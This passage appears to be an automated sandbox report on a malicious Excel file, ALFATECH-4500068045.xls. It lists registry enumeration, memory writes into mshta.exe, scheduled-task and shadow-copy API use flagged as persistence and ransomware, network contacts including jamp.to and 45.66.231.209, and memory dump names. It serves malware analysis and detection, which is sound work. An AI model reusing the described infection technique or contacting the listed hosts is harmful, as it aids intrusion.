Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3092 wrote to memory of 64 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 3092 wrote to memory of 64 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ALFATECH-4500068045.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 jamp.to udp
US 104.21.40.193:443 jamp.to tcp
US 8.8.8.8:53 c.pki.goog udp
FR 216.58.214.163:80 c.pki.goog tcp
US 8.8.8.8:53 193.40.21.104.in-addr.arpa udp
US 8.8.8.8:53 163.214.58.216.in-addr.arpa udp
NL 45.66.231.209:80 45.66.231.209 tcp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.231.66.45.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/3092-0-0x00007FF80BBF0000-0x00007FF80BC00000-memory.dmp

memory/3092-1-0x00007FF84BC0D000-0x00007FF84BC0E000-memory.dmp

memory/3092-3-0x00007FF80BBF0000-0x00007FF80BC00000-memory.dmp

memory/3092-2-0x00007FF80BBF0000-0x00007FF80BC00000-memory.dmp

memory/3092-6-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

memory/3092-8-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

memory/3092-10-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

memory/3092-9-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

memory/3092-11-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

memory/3092-7-0x00007FF80BBF0000-0x00007FF80BC00000-memory.dmp

memory/3092-13-0x00007FF8093C0000-0x00007FF8093D0000-memory.dmp

memory/3092-12-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

memory/3092-5-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

memory/3092-4-0x00007FF80BBF0000-0x00007FF80BC00000-memory.dmp

memory/3092-14-0x00007FF8093C0000-0x00007FF8093D0000-memory.dmp

memory/64-34-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

memory/64-35-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

memory/64-37-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

memory/64-39-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

memory/3092-41-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

memory/3092-42-0x00007FF84BC0D000-0x00007FF84BC0E000-memory.dmp

memory/3092-43-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

memory/64-47-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

memory/64-48-0x00007FF6C2320000-0x00007FF6C2328000-memory.dmp

memory/3092-77-0x00007FF80BBF0000-0x00007FF80BC00000-memory.dmp

memory/3092-78-0x00007FF80BBF0000-0x00007FF80BC00000-memory.dmp

memory/3092-80-0x00007FF80BBF0000-0x00007FF80BC00000-memory.dmp

memory/3092-79-0x00007FF80BBF0000-0x00007FF80BC00000-memory.dmp

memory/3092-81-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp